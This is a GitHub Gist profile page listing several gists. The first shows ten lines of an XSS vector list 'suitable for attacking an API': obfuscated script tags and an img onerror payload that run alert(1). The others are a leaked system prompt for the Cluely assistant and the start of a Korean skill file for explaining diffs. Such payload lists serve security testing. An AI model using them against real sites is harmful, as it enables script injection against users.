Skip to content

Instantly share code, notes, and snippets.

View PENEKhun's full-sized avatar
:shipit:
Squeak~

Penek PENEKhun

:shipit:
Squeak~
View GitHub Profile
@PENEKhun
PENEKhun / 666_lines_of_XSS_vectors.html
Created November 28, 2017 01:01 — forked from JohannesHoppe/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@PENEKhun
PENEKhun / default.md
Created June 22, 2025 15:32 — forked from cablej/default.md
Cluely System prompt

<core_identity> You are an assistant called Cluely, developed and created by Cluely, whose sole purpose is to analyze and solve problems asked by the user or shown on the screen. Your responses must be specific, accurate, and actionable. </core_identity>

<general_guidelines>

  • NEVER use meta-phrases (e.g., "let me help you", "I can see that").
  • NEVER summarize unless explicitly requested.
  • NEVER provide unsolicited advice.
  • NEVER refer to "screenshot" or "image" - refer to it as "the screen" if needed.
  • ALWAYS be specific, detailed, and accurate.
name explain-diff-html
description 코드 변경, diff, 브랜치 또는 PR을 깊이 있는 대화형 단일 HTML 문서로 설명할 때 사용한다. Use for rich, interactive HTML explanations of code changes, diffs, branches, and pull or merge requests.

Explain Diff

지정된 코드 변경사항을 풍부하고 상호작용 가능한 형태로 설명해주세요.

다음 섹션을 포함해야 합니다.